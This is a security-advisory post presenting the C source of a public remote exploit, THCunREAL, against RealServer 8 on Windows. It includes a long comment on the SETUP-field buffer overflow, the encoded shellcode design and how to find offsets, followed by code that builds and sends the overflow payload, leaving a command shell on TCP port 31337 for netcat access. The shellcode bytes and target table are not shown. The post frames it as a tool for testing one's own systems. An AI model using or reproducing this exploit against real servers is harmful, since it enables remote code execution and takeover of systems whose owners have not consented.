A vulnerability in RealNetworks' RealServer allows a remote attacker to crash the server or execute arbitrary code on it (for additional information see our previous article: RealSystem Server and Proxy Buffer Overflow Vulnerability). The following exploit code can be used to test your own systems for the mentioned vulnerability. Run it only against servers you are authorized to test: a successful run leaves a command shell listening on TCP port 31337 on the target.
Vulnerable systems:
* RealServer version 8.0.0.149
* RealServer version 8.0.2
/*****************************************************************************/
/* THCunREAL 0.1 - Wind0wZ remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* This exploit can be freely distributed ! If u r smart enough you can add */
/* further offsets for other OS Versions/Types/Servicespacks blabla.... */
/* */
/* The exploit was tested on 4 different boxes with RealServer 8.0.0.149 */
/* The bug is exploitable on RealServers < 8.0.2 (the advisory above also */
/* lists 8.0.2 itself as vulnerable; check the vendor's fixed-version list) */
/* */
/* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554 */
/* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
/* */
/* The shellcode used in this exploit is completely offsetless and XOR 0x20 */
/* encoded, because RealServer doesn't allow the following bytes in the SETUP */
/* field : 0x00,0x0d,0x0a,0x25,0x20,0xff ! That's also the reason why i use */
/* mov dl,0x1f + add dl,0x01 for xor 0x20 encoding. hehehe... */
/* */
/* The shellcode itself scans for the KERNEL32.DLL by using FS:0 + searching */
/* for 'MZ' entry, followed by analysing the PE-Header for API offsets */
/* needed by this shellcode. After that we can load WS2_32.DLL for socket */
/* APIs and begin the usual shellcode process ! Thanx to several virus */
/* coders and Halvar Flake for that rocking idea ! I was wondering why so */
/* few people are using it today in their exploits ! Just because LSD */
/* has made this technique public on HiverCon 2002 ! Actually this one isn't */
/* optimized, but later shellcodes will have a size < 300 bytes. */
/* */
/* After successful exploitation of this bug, a commandshell should spawn on */
/* TCP port 31337 ! Use netcat to connect to this port ! */
/* */
/* To find further offsets use softice on windows or gdb on linux boxes ! */
/* If you're debugging with softice do the following to find offsets : */
/* Start the Realserver 8 ! ;) */
/* Enter softice and do the following commands : */
/* addr rmserver + bpx 405cfc */
/* Start the exploit and softice will break on the following lines of code : */
/* */
/* mov ecx,[eax] */
/* lea edx,[ebp+FFFFF000] */
/* push 00 */
/* push edx */
/* push 80004005 */
/* push 80004005 */
/* push 03 */
/* call [ecx+0c] */
/* */
/* As we can overwrite EAX, we have to create 3 values */
/* (2 retlocs and 1 retaddr), to get control of a vuln system ! */
/* The good news is, that just the EAX value can differ on different OSs/SPs */
/* The rest can be calculated ! */
/* retloc2 = retloc1-8; */
/* retaddr = retloc1+8; */
/* */
/* Unfortunately I didn't have a Linux/Sparc or any other platform RealServer 8 */
/* runs on. I just know it's also exploitable on other OSs ! */
/* So if u wanna exploit other platforms, try to get Realserver 8 and use */
/* gdb to find out, how this can be exploited ! Good luck ! */
/* */
/* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, zip, zilvio and the rest of the combo ...... */
/*****************************************************************************/
memset(exploit_buffer,'Z',4123);
memcpy(exploit_buffer,"SETUP /",7);
*(unsigned long *)&exploit_buffer[7] = retloc2;
*(unsigned long *)&exploit_buffer[7 + 4] = retaddr;
memcpy(&exploit_buffer[15],w32portshell,strlen(w32portshell));
*(unsigned long *)&exploit_buffer[4086] = targets[atoi(argv[2])].retloc1;
memcpy(&exploit_buffer[4090]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(realport);
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,exploit_buffer,4123,0);
printf("\nexploit send .... sleeping a while ....\n");
Sleep(1000);
printf("\nok ... now try to connect to port 31337 via netcat !\n");
}
else
printf("can't connect to realserver port!\n");
shutdown(sock,1);
closesocket(sock);
exit(0);
}
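/*
 * Print the command-line usage and the table of supported targets, then exit.
 *
 * The target table `targets[]` (defined elsewhere in this file) is walked
 * until an entry whose `winver` pointer is NULL; the printed index of each
 * entry is the <target-type> value the user passes as the second argument.
 *
 * NOTE(review): main() indexes targets[] with atoi(argv[2]) without a bounds
 * check, so an out-of-range <target-type> reads past the table; only the
 * indices printed here are valid.
 *
 * Never returns: always terminates the process with exit status 0 (kept
 * as in the original even though a usage error would conventionally be
 * non-zero).
 */
void usage(void)
{
	unsigned int a;
	printf("\nUsage: <Host> <target-type>\n");
	printf("\nTargets available :\n\n");
	/* %u, not %d: `a` is unsigned, and a mismatched conversion is UB. */
	for (a = 0; targets[a].winver != NULL; a++)
		printf("%u) - %s\n", a, targets[a].winver);
	exit(0);
}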